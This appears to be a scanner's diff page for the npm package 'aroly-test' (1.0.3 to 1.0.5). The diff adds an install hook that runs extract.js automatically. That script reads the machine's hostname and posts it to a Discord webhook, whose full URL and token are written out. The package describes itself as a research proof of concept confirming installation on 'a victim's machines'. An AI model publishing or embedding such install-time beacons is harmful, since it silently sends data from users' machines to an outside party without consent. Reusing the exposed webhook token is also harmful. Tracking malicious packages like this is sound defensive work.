aroly-test 1.0.3 → 1.0.5
Sign up to get free protection for your applications and to get access to all the features.
- package/extract.js +3 -3
- package/package.json +2 -2
package/extract.js
CHANGED
@@ -4,14 +4,14 @@ var hostname = os.hostname();
|
|
4
4
|
|
5
5
|
const data = new TextEncoder().encode(
|
6
6
|
JSON.stringify({
|
7
|
-
|
7
|
+
content: hostname,
|
8
8
|
})
|
9
9
|
);
|
10
10
|
|
11
11
|
const options = {
|
12
|
-
hostname: '
|
12
|
+
hostname: 'discord.com',
|
13
13
|
port: 443,
|
14
|
-
path: '/',
|
14
|
+
path: '/api/webhooks/1260528028996341790/IFm-pVEdO0C2oJirxkUUq9TkOGO535Acs89v4mX3hsGenUGSKZONhgt6T73qmhvfVUHO',
|
15
15
|
method: 'POST',
|
16
16
|
headers: {
|
17
17
|
'Content-Type': 'application/json',
|
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "aroly-test",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.5",
|
4
4
|
"description": "This package is a proof of concept used by Antoine Roly to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way.",
|
5
5
|
"main": "index.js",
|
6
6
|
"author": "Antoine Roly <antoine.roly@gmail.com>",
|
7
7
|
"license": "ISC",
|
8
8
|
"dependencies": {
|
9
|
-
"aroly-test": "^1.0.
|
9
|
+
"aroly-test": "^1.0.4"
|
10
10
|
},
|
11
11
|
"scripts": {
|
12
12
|
"install": "node extract.js"
|